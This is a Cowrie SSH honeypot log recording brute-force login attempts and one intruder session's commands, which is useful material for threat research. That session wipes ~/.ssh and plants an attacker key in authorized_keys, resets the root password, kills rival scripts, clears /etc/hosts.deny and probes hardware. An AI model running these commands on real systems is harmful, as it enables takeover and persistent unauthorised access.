{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:10:42.997479Z","src_ip":"77.75.56.63","session":"52f85f6fc4be"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:10:43.153202Z","src_ip":"103.206.72.2","session":"ea043d56a2b5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:10:43.653881Z","src_ip":"77.75.56.63","session":"52f85f6fc4be"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":45710,"dst_ip":"1.2.3.4","dst_port":22,"session":"d13512e557ba","protocol":"ssh","message":"New connection: 77.75.56.63:45710 (1.2.3.4:22) [session: d13512e557ba]","sensor":"my-vps","timestamp":"2025-09-08T20:10:44.772182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:10:44.773186Z","src_ip":"77.75.56.63","session":"d13512e557ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:10:44.828027Z","src_ip":"77.75.56.63","session":"d13512e557ba"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:10:44.876278Z","src_ip":"77.75.56.63","session":"52f85f6fc4be"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:10:45.074190Z","src_ip":"77.75.56.63","session":"d13512e557ba"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:10:45.119972Z","src_ip":"77.75.56.63","session":"d13512e557ba"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:10:45.340672Z","src_ip":"77.75.56.63","session":"0841cbdf3ebe"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":47862,"dst_ip":"1.2.3.4","dst_port":22,"session":"784058560510","protocol":"ssh","message":"New connection: 216.107.136.92:47862 (1.2.3.4:22) [session: 784058560510]","sensor":"my-vps","timestamp":"2025-09-08T20:10:57.631997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:10:57.632645Z","src_ip":"216.107.136.92","session":"784058560510"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:10:57.722617Z","src_ip":"216.107.136.92","session":"784058560510"}
{"eventid":"cowrie.login.failed","username":"phpmyadmin","password":"!","message":"login attempt [phpmyadmin/!] failed","sensor":"my-vps","timestamp":"2025-09-08T20:10:58.120631Z","src_ip":"216.107.136.92","session":"784058560510"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:10:59.213063Z","src_ip":"216.107.136.92","session":"784058560510"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":59158,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5fc3a0a587f","protocol":"ssh","message":"New connection: 77.75.56.63:59158 (1.2.3.4:22) [session: c5fc3a0a587f]","sensor":"my-vps","timestamp":"2025-09-08T20:11:45.721081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:11:45.722068Z","src_ip":"77.75.56.63","session":"c5fc3a0a587f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:11:45.764859Z","src_ip":"77.75.56.63","session":"c5fc3a0a587f"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator@123","message":"login attempt [operator/operator@123] failed","sensor":"my-vps","timestamp":"2025-09-08T20:11:45.951340Z","src_ip":"77.75.56.63","session":"c5fc3a0a587f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:11:46.995080Z","src_ip":"77.75.56.63","session":"c5fc3a0a587f"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":57566,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd2b2ea11c33","protocol":"ssh","message":"New connection: 103.206.72.2:57566 (1.2.3.4:22) [session: cd2b2ea11c33]","sensor":"my-vps","timestamp":"2025-09-08T20:11:58.934251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:11:58.938825Z","src_ip":"103.206.72.2","session":"cd2b2ea11c33"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:11:59.109660Z","src_ip":"103.206.72.2","session":"cd2b2ea11c33"}
{"eventid":"cowrie.login.failed","username":"student1","password":"123456","message":"login attempt [student1/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T20:11:59.798471Z","src_ip":"103.206.72.2","session":"cd2b2ea11c33"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:00.975866Z","src_ip":"103.206.72.2","session":"cd2b2ea11c33"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":60080,"dst_ip":"1.2.3.4","dst_port":22,"session":"15682cdce881","protocol":"ssh","message":"New connection: 216.107.136.92:60080 (1.2.3.4:22) [session: 15682cdce881]","sensor":"my-vps","timestamp":"2025-09-08T20:12:42.493193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:12:42.493921Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:12:42.583718Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.login.success","username":"root","password":"zzidc2025","message":"login attempt [root/zzidc2025] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:12:42.985593Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:43.219525Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:12:43.220267Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:12:43.221265Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:43.312239Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:43.508859Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:12:43.509578Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:12:43.604495Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:43.605363Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":39426,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dceb391c957","protocol":"ssh","message":"New connection: 77.75.56.63:39426 (1.2.3.4:22) [session: 1dceb391c957]","sensor":"my-vps","timestamp":"2025-09-08T20:12:51.994134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:12:51.995833Z","src_ip":"77.75.56.63","session":"1dceb391c957"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:12:52.030490Z","src_ip":"77.75.56.63","session":"1dceb391c957"}
{"eventid":"cowrie.login.failed","username":"david","password":"1234567","message":"login attempt [david/1234567] failed","sensor":"my-vps","timestamp":"2025-09-08T20:12:52.228993Z","src_ip":"77.75.56.63","session":"1dceb391c957"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:53.266501Z","src_ip":"77.75.56.63","session":"1dceb391c957"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:55.748635Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T20:12:55.749397Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:55.840774Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:56.037308Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"echo \"root:3BBkjaIL9Nzu\"|chpasswd|bash","message":"CMD: echo \"root:3BBkjaIL9Nzu\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-08T20:12:56.038007Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/51d31d527df78de7b61072b4432dceaf5e40830585b8533ef202e6b92ae5b53a","size":21,"shasum":"51d31d527df78de7b61072b4432dceaf5e40830585b8533ef202e6b92ae5b53a","duplicate":false,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/51d31d527df78de7b61072b4432dceaf5e40830585b8533ef202e6b92ae5b53a after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:56.129150Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:56.353844Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-08T20:12:56.354552Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-08T20:12:56.447943Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:56.448947Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:56.681243Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-08T20:12:56.681922Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:12:56.773407Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:12:56.972741Z","src_ip":"216.107.136.92","session":"15682cdce881"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-08T20:12:56.973424Z","src_ip":"216.107.136.92","session":"15682cdce881"}
